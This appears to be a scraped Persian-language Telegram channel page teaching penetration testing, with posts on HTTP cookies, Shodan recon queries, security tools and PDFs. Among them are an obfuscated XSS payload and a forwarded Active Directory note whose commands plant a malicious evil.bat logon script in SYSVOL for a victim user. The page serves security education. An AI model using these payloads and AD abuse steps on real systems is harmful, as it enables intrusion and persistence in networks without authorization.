Try Hack Box – Telegram
Try Hack Box
5.76K subscribers
680 photos
65 videos
123 files
689 links
1 Nov 2020
1399/08/11
Learn penetration testing & Red Team
https://youtube.com/@tryhackbox
Channels :
@TryHackBoxOfficial ( RoadMap )
@TryHackBoxStory ( Story Hacking )
Contact : @ThbxSupport
Download Telegram
🚀 پارت 4 (A)
🍪 کوکی‌ها (Cookies): از شناسایی تا ذخیره اطلاعات

در پست قبل راجع به اساسيات کوکی‌ها صحبت کردیم. حالا بپردازیم به جزئیات بیشتر!

🔢 چه اطلاعاتی در کوکی ذخیره می‌شود؟
کوکی‌ها می‌توانند حاوی هر اطلاعاتی باشند، اما اغلب شامل یک شماره شناسه منحصر به فرد (Unique ID) هستند که توسط سرور برای اهداف بازیابی استفاده می‌شود.
مثال: سرور یک کوکی با مقدار id=34294 برای کاربر قرار می‌دهد. سپس می‌تواند از این شماره برای جستجوی اطلاعات بیشتر کاربر (مانند تاریخچه خرید، آدرس و...) در پایگاه داده خودش استفاده کند.

✍️نویسنده
@TryHackBox | The Chaos

#HTTP #Cookies #CyberSecurity
7
🔔 اطلاعیه

دوستان گرامی،
محتوای آموزشی این مجموعه با صرف زمان و تلاش فراوان تهیه می‌شود. متأسفانه در مواردی دیده شده که مطالب بدون ذکر منبع بازنشر شده‌اند.

ذکر منبع هنگام استفاده از محتوا، احترام به حقوق معنوی و تلاش تیم ماست و باعث می‌شود این روند آموزشی با انگیزه و استمرار بیشتری ادامه پیدا کند.

از همراهی و توجه شما سپاسگزاریم و امیدواریم دیگر شاهد چنین مواردی نباشیم.

@TryHackBox
16
👩‍💻 عملگرهای انتساب منطقی در JavaScript برای بهره‌برداری از XSS به عنوان یک مثال دیگر از اهمیت دور شدن از پیلودهای معمولی.
window&&=(window&&=opener||=alert)?.(1??0,)

#bugbounty #tips
@TryHackBox
6
🚀 پارت 4 (B)

📝 ذخیره مستقیم اطلاعات
با این حال، کوکی‌ها فقط به یک ID محدود نیستند. برخی سرورها انتخاب می‌کنند که اطلاعات را مستقیماً در کوکی نگه دارند. مثال:
Cookie: name="Brian Totty"; phone="555-1212"

🎒 کوله پشتی کاربر (Cookie Jar)
مرورگر، محتوای کوکی‌های ارسالی از سرور را در هدرهای Set-Cookie به خاطر می‌سپارد و مجموعه کوکی‌ها را در یک فضای ذخیره سازی به نام Cookie Jar ( like یک چمدان پر از برچسب های مختلف سرورها) ذخیره می کند.
وقتی کاربر در آینده به همان سایت بازگردد، مرورگر، کوکی‌های مربوط به آن سرور را انتخاب کرده و آن‌ها را در هدر درخواست Cookie ارسال می‌کند.

🎯 هدف اصلی کوکی‌ها: State Management
هدف اصلی کوکی‌ها این است که به مرورگر اجازه می‌دهند مجموعه‌ای از اطلاعات خاص یک سرور را جمع آوری کند و هر بار که کاربر آن سایت را باز می‌کند، این اطلاعات را به سرور ارائه دهد.
از آنجایی که وظیفه ذخیره اطلاعات کوکی بر عهده مرورگر است، به این سیستم اصطلاحاً مدیریت状态 سمت کلاینت (Client-Side State) می‌گویند. مشخصات رسمی کوکی‌ها با نام HTTP State Management Mechanism شناخته می‌شود.

📁 مرورگرها و ذخیره سازی کوکی‌ها
مرورگرهای مختلف، کوکی‌ها را به روش‌های مختلف ذخیره می‌کنند.
مرورگر Netscape Navigator کوکی‌ها را در یک فایل متنی به نام cookies.txt ذخیره می‌کند.
هر خط در این فایل نشان‌دهنده یک کوکی است و هفت فیلد دارد که با تب از هم جدا شده‌اند:

domain: دامنه‌ای که کوکی به آن تعلق دارد.

allh: اگر TRUE باشد، به این معنی است که همه میزبان‌های خاص در آن دامنه می‌توانند کوکی را دریافت کنند.

path: مسیری در دامنه که با کوکی مرتبط است.

secure: اگر TRUE باشد، کوکی فقط از طریق یک اتصال SSL امن ارسال می‌شود.

expiration: زمان انقضای کوکی به شکل ثانیه از 1 ژانویه 1970, 00:00:00 GMT (مبدأ زمان یونیکس).

name: نام متغیر کوکی.

value: مقدار متغیر کوکی.

✍️نویسنده
@TryHackBox | The Chaos

#HTTP #Cookies #CyberSecurity
👍41
OSCP Study Tips to Help You Succeed THB.pdf
466.9 KB
۹ نکته مطالعه OSCP برای کمک به موفقیت شما توسط OffSec
@TryHackBox | Github | YouTube | Group
#OSCP #OffSec
👍82
Top 10 Most Dangerous Active Directory Attack Methods.pdf
1.4 MB
✏️ مقاله تالیف شده
Top 10 Most Dangerous Active Directory Attack Methods

📚برخی از سرفصل ها

📗بخش اول: Active Directory (AD)

📕بخش دوم: توضیح ۱۰ مورد از خطرناک‌ترین روش حمله به Active Directory
به همراه معرفی ابزار های هر مورد

📘بخش سوم : راهبردهای جامع برای افزایش امنیت Active Directory

🔖بخش چهارم : ساخت یک دفاع مقاوم در برابر حملات Active Directory


✍️نویسنده
@TryHackBox | The Chaos

#AD #Acrive_Directory #Cybersecurity
11👍3
Forwarded from 
یادداشت‌ های اکسپلویت از تست نفوذ Active Directory - بخش دوم

  

3. آپلود داده‌ های جمع‌آوری‌ شده (Upload Collected Data) 
پس از اجرا، فایل‌های نتیجه (*.json) در دایرکتوری فعلی تولید می‌ شوند. تمام این فایل‌های JSON را به BloodHound در مرورگر وب آپلود کنید. 

می‌توانیم روابط در Active Directory را کاوش کنیم.

بررسی (Investigation)

فهرست همه کاربران
net user /domain
net user <username> /domain
Get-ADUser -Filter *
Get-ADUser -Identity <username> -Server dc.example.com -Properties *
Get-ADUser -Filter 'Name -like "*michael"' -Server dc.example.com | Format-Table Name,SamAccountName -A

فهرست همه گروه‌ها
net group /domain
net group "<group>" /domain
PS> Get-ADGroup -Identity <group> -Server dc.example.com -Properties *
PS> Get-ADGroupMember -Identity <group> -Server dc.example.com

فهرست سیاست رمز عبور
net accounts /domain
# فهرست اشیاء AD
$ChangeDate = New-Object DateTime(2022, 02, 28, 12, 00, 00)
Get-ADObject -Filter 'whenChanged -gt $ChangeDate' -includeDeletedObjects -Server dc.example.com

بازیابی اطلاعات در مورد دامنه داده‌ شده.
Get-ADDomain -Server dc.example.com

تغییر رمز عبور کاربر AD
Set-ADAccountPassword -Identity <username> -Server dc.example.com -OldPassword (ConvertTo-SecureString -AsPlaintext "oldpass" -force) -NewPassword (ConvertTo-SecureString -AsPlaintext "newpass" -force)
# SYSVOL

یک پوشه اشتراکی که Group Policy Objects (GPOs) را ذخیره می‌ کند.

dir \\dc.example.com\SYSVOL\

سوءاستفاده از اسکریپت ورود برای کاربران دیگر (Abuse Logon Script for Other Users)
اگر کاربر فعلی مجوز نوشتن اسکریپت‌ ها در SYSVOL را داشته باشد، ممکن است بتوانیم مسیر اسکریپت ورود کاربران دیگر را تغییر دهیم.

1. بررسی مجوز
icacls C:\Windows\SYSVOL\sysvol\example.local\noscripts\

2. تغییر/اضافه کردن یک اسکریپت مخرب
'powershell -e <BASE64_COMMAND>' | OutFile -FilePath C:\Windows\SYSVOL\sysvol\example.local\noscripts\evil.bat

3. تنظیم اسکریپت ورود برای کاربر مشخص‌شده
Set-ADUser -Identity VictimUser -ScriptPath '\\example.local\SYSVOL\example.local\noscripts\evil.bat

هنگامی که کاربر دیگر وارد سیستم می‌ شود، اسکریپت .bat اجرا خواهد شد.

#NoteADExploit
@KavehAPT
7
سلام به همه دوستان خوبم -

🔒 متأسفانه کانال قبلی ما توسط تلگرام بسته شد، اما خبر خوب اینه که دوباره با قدرت بیشتر و محتوای جذاب‌تر برگشتیم!

اینجا قراره دوباره شروع کنیم:
آموزش‌های حرفه‌ای هک و امنیت (کاملاً قانونی و آموزشی)
نکات و مطالب برنامه‌نویسی
دوره‌های آموزشی ارزشمند
طنزهای خفن کامپیوتری برای لحظات فان 😎

🔥 ما تازه شروع کردیم و قراره خیلی سورپرایز داشته باشیم...
اگه می‌خوای اولین نفر باشی که محتوای جدید رو می‌بینه، همین الان عضو شو 👇

ارادتمند شما - سجاد تیموری


🆔 @Sajjad_Teymouri
6🔥1
🔖 مجموعه‌ای از کوئری‌ های Shodan که میتوان در جریان Reconnaissance (مرحله شناسایی) استفاده کرد:

فیلتر بر اساس سازمان:

  org:"Example"

فیلتر بر اساس فرم‌ های ورود (Login Pages):


  http.noscript:"Login"

فیلتر بر اساس هاست‌ هایی که از گواهی‌ های SSL موردنظر استفاده می‌ کنند:


  ssl:"example\.com" || ssl.cert.subject.cn:"example\.com"

فیلتر بر اساس وب‌سرور Apache:


  server:"Apache"

فیلتر بر اساس هاست‌ های مرتبط با نود تارگت از طریق هش (favicon hash):


  http.favicon.hash:0123456789

#recon #tips
@TryHackBox
8
🔖 تقویت امن و مطمئن ویندوز با استفاده از روش‌های رسمی مایکروسافت و راهنماهای جامع:

یک ریپازیتوری کاربردی برای هکرهای اخلاقی
اگر حفظ حریم خصوصی براتون مهمه، هر سیستمی که روی اون کار می‌ کنید باید شخصی‌ سازی بشه. هدف این ریپازیتوری دقیقاً همینه کمک به شما برای پیکربندی فقط ابزارها و قابلیت‌ هایی که مایکروسافت در ویندوز پیاده‌ سازی کرده، تا بتونید امنیت رو به حداکثر برسونید و دسترسی‌ها رو محدود کنید؛ اون هم با استفاده از روش‌های مستند، پشتیبانی‌ شده، توصیه‌ شده و رسمی

Install-Module -Name 'Harden-Windows-Security-Module' -Force

👩‍💻 گیت‌هاب & سایت

@TryHackBox
#امنیت
5
Forwarded from P.F.K Security
مهندسی معکوس از Kaspersky Lab

به‌تازگی تیمِ «مرکز جهانی تحقیقات و تحلیل تهدیدات» ابزار جدیدی به نام hrtng را با جامعه به اشتراک گذاشته است. این ابزارپلاگین برای IDA Proro است که روند مهندسی معکوس نمونه‌ های پیچیده را ساده و قابل‌مدیریت‌ تر می‌کند.

دقیقاً چگونه؟ در این راهنما بخوانید راهنمایی عملی که تحلیل یک مؤلفه از بدافزار جاسFinSpypy را نمایش می‌ دهد و چند نکتهٔ کلی و کاربردی برای کار با IDA ارائه می‌ کند.

https://securelist.com/hrtng-ida-pro-plugin/114780/

#reverse #practice
@PfkSecurity
ابزار PwnFox افزونه‌ ای برای Firefox/Burp Suite که ابزارهای مفیدی برای یک باگ‌ هانتر فراهم می‌ کند:

راه‌اندازی BurpProxy با یک کلیک
پروفایل‌های Container برای استفاده از چند حساب کاربری در یک مرورگر
ثبت (لاگ) پیام‌های PostMessage
جعبه‌ابزار (Toolbox) و ابزارهای دیگر

این autochrome چیزی مشابه برای Chrome (یا Chromium).

@TryHackBox #BugBounty #Tools
🔥84
همکاری با تیم امنیتی ما 

ما در حال عضو گیری هستیم یک تیم پویا و نوپا در حوزه ردتیم و تست نفوذ هستیم که بر روی عملیات ردتیم (Red Team)، تست نفوذ، تولید محتوای آموزشی پیشرفته و توسعه ابزارهای امنیتی تمرکز دارد. هدف ما ارائه خدمات مشاوره‌ای و آموزش‌های عملی و خلق محتوای جذاب برای جامعه امنیتی است. 

اگر علاقه‌مند به پیوستن به تیمی هستید این فرصت را از دست ندهید! 

موقعیت‌ های مورد نیاز: 

1. مدرسین حوزه تست نفوذ (وب و شبکه و مهندسی معکوس و انالیز بدافزار و امنیت شبکه و مدرسین حوزه های شبکه و برنامه نویسی )  .

2. ادمین‌های تولید محتوا (اینستاگرام، تلگرام و سایر پلتفرم‌ ها)  .

> اولویت با افراد تازه کار فعال و با انرژی هست .
> توانایی ساخت پست‌ های جذاب‌ که آموزش داده می شود.

3. تیم پادکست
> اولویت با افراد تازه کار فعال و با انرژی هست .
> مسئولیت ضبط و تدوین پادکست‌ های امنیتی. 
> برگزاری لایوهای تعاملی با موضوعات روز امنیتی. 

4. محققان امنیتی (Security Researchers) 
  > تمرکز بر کشف آسیب‌پذیری‌ های جدید Zero-Day Research
> انتشار مقالات فنی و تحقیقات . 

5. کارآموزان و تازه‌ واردان به حوزه امنیت 
 > فرصت یادگیری در کنار تیم ما  
 > آموزش گام‌ به‌ گام تست نفوذ

6. مترجمان برای کتابهای تخصصی و مقالات
> ترجمه کتاب های تخصصی و مقالات و کتابچه های امنیتی

چرا به ما بپیوندید؟ 
کار در یک تیم جوان و نوآور با فضایی پویا و چالش‌برانگیز. 
دسترسی به منابع آموزشی برای رشد حرفه‌ای. 


چگونه اقدام کنیم؟ 
رزومه ، نمونه‌ کارها (مقالات، پست‌های آموزشی، کدهای GitHub و ...) و هرگونه سوال را به آدرس زیر ارسال کنید.
 
پیام به پشتیبانی:
🆔 @ThbxSupport

ما منتظر استعدادهای پرانرژی مثل شما هستیم! 🔥 
👍91
💡 وقتی برنامه‌ای را در ترمینال یا از طریق SSH اجرا می‌ کنید، آن برنامه به محض پایان جلسه ترمینال یا قطع شدن اتصال، خاتمه می‌ یابد.

برای جلوگیری از این مسئله و نگه داشتن برنامه و تمام پروسس های آن در حال اجرا، از دستور nohup استفاده کنید. این دستور تمام سیگنال‌ های پایان جلسه را نادیده میگیرد و اجازه می‌ دهد پروسس حتی اگر جلسه ترمینال قطع شود، به کار خود ادامه دهد.

دستور nohup همچنین فایلی به نام nohup.out ایجاد می‌ کند تا خروجی دستور را ذخیره کند.
$ cat nohup.out

به عنوان جایگزین، می‌ توانید از tmux/disown/screen استفاده کنید.

#linux #tips
@TryHackBox
👍72
Windows important DLLs.pdf
486.8 KB
🔐 موضوع DLLهای مهم ویندوز در امنیت سایبری
تحلیل شده توسط Arash Narimanpour


مطالعه‌ای ارزشمند از Arash Narimanpour درباره DLLهای مهم ویندوز و نقش‌شان در امنیت سیستم. اگر می‌خواید بفهمید چه فایل‌های DLL ممکنه مورد سوءاستفاده قرار بگیرن یا نقطه ضعف باشند، این پست رو از دست ندید.

👤 نویسنده‌ها:

* Arash Narimanpour
* Mohammad-Hosein Aliyari
* آقای علیاری
⚙️ چرا این موضوع اهمیت داره؟

* در واقع DLLها بخش جدایی‌ناپذیر از عملکرد ویندوز هستند و بارگذاری ماژول‌هایی که برنامه‌ها برای اجرا به آن‌ها نیاز دارند.
* برخی DLLها می‌تونن به درهای پشتی بدل بشن یا در پروسس های injection مورد استفاده قرار بگیرن.
* شناخت دقیق اینکه چه DLLهایی معمولاً در حملات بهره‌برداری می‌شن، کمک می‌کنه تا در شناسایی رفتار مخرب و جلوگیری از نفوذ سریع‌تر عمل کنیم.

✍️ تهیه شده توسط
@TryHackBox | The Chaos

#Windows #DLL #CyberSecurity
👍115
27 Use Cases for Burp Suite for Penetration Testers THB.pdf
602.7 KB
۲۷ مورد استفاده از Burp Suite برای پنتسترها

@TryHackBox | Github | YouTube | Group
#BurpSuite
12
Windows Process Injection in 2019 THB.pdf
2.9 MB
این مقاله به بررسی تکنیک‌ های تزریق پروسس در ویندوز میپردازه، که یکی از روش‌ های رایج بدافزارها برای پنهان‌ کاری و دور زدن ابزارهای امنیتی مثل آنتی‌ویروس، DLP (Data Loss Prevention) و فایروال‌هاست. تزریق پروسس یعنی کد مخرب رو داخل یک پروسس قانونی (مثل explorer.exe) اجرا کنی بدون اینکه فرآیند جدیدی بسازی ...
منبع
@TryHackBox | Github | YouTube | Group

#Windows #Process #Injection
👍7🔥2👌1